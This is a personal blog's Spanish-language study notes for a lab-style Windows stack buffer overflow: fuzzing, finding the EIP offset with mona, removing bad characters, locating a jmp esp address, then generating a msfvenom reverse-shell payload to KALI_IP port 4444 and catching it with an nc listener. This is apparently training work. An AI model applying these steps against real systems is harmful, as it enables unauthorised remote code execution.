python fuzzer.py

Pasted image 20210618141953.png

/usr/share/metasploit-framework/tools/exploit/pattern\_create.rb -l 2000 o se puede usar esto msf-pattern_create -l 2000

Pasted image 20210615084417.png

Pasted image 20210615084325.png

Reiniciar app python3 exploit.py

!mona findmsp -distance 2000

Pasted image 20210618142228.png

Ahora cambiamos el offset en el archivo de exploit.py al numero offset 1514 Y tambien rtn le ponemos un valor de "BBBB"

Reiniciar app

!mona bytearray -b "\x00"

chequear que bytearray.bin este generado en el folder de mona Reiniciar app

python3 bad_characters.py

Pasted image 20210616112718.png

Reiniciar app Pegar el output a payload python3 exploit.py

!mona compare -f C:\mona\oscp\bytearray.bin -a <address>

Pasted image 20210618142717.png

escribimos los bad chars 00 04 05 3e 3f e1 e2

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618142837.png

Le quitamos el x04 del payload hasta llegar al ultimo bad_char

Pasted image 20210618142921.png

Ahora el bad char es: 3e 3f e1 e2 \x00\x04

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618143036.png

Le quitamos el x3e del payload hasta llegar al ultimo bad_char

Pasted image 20210618143130.png

Ahora el bad char es: e1 e2 \x00\x04\x3e

En esta parte me sale el error igual en x3e entonces lo que se puede hacer es borrar todo lo que esta en el folder mona !mona bytearray -b "\x00\x04\x3e\x3f\xe1"

Donde dice ESP le damos click derecho y Follow in Dump

Pasted image 20210618145457.png

Le quitamos el xe1 del payload hasta llegar al ultimo bad_char

Pasted image 20210618145404.png

Ahora el bad char es: \x00\x04\x3e\x3f\xe1

--Al terminar cambiando todos los bad chars deberia de salir unmodified como ultimo paso y nada de bad_chars

!mona jmp -r esp -cpb "\x00\x04\x3e\x3f\xe1"

Vamos a Window->Log data Agarramos el numero # y despues lo escribos alreves por ejemplo 625011af seria \xaf\x11\x50\x62

cambiamos el rtn y iniciamos payload='' esto en exploit.py

msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b "\x00\x04\x3e\x3f\xe1" -f c

padding = "\x90" * 16

nc -lvnp 4444

blog

copyright©2022 Cu3rv0x all rights reserved